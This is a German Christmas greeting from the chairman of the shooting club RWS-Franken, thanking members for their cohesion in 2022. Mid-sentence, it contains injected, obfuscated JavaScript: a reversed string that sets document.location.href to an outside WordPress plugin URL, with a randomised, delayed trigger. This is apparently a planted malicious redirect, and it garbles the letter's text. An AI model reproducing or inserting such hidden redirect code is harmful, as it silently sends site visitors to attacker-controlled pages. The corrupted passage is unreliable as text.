Liebe Sportfreunde,

 

ich kann es gar nicht glauben, Weihnachten steht schon wieder vor der Tür, „was schon wieder Weihnachten?“, das Jahr 2022 ging vorüber wie im Fluge ……..

Wie immer haben wir für unsere Ziele zusammengestanden, gerackert und gekämpft, viele unserer Schützlinge konnten sich dadurch erheblich steigern und an den Zielmeisterschaften gut umsetzen.

Dieser Zusammenhalt (Sportler / Betreuer) zeichnet RWS-Franken aus und ist nicht nur die Grundlage für unsere Sportaktivitäten, sondern auch um besondere

Herausforderungen gemeinsam zu bewältigen.

Ich freue mich sehr, dass wir eine so großartige Gemeinschaft haben, ich bin stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolz darauf ein Teil davon zu sein.

Jetzt ist die Zeit gekommen, ein wenig Abstand zu gewinnen und die Weihnachtszeit individuell zu genießen.

Ich möchte mich nochmal herzlich bei Euch für Eure Unterstützung bedanken. Passt auf Euch auf und bleibt gesund.

 

Wir sind RWS!

 

Euer

Günther Reizammer

1.Schützenmeister

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden.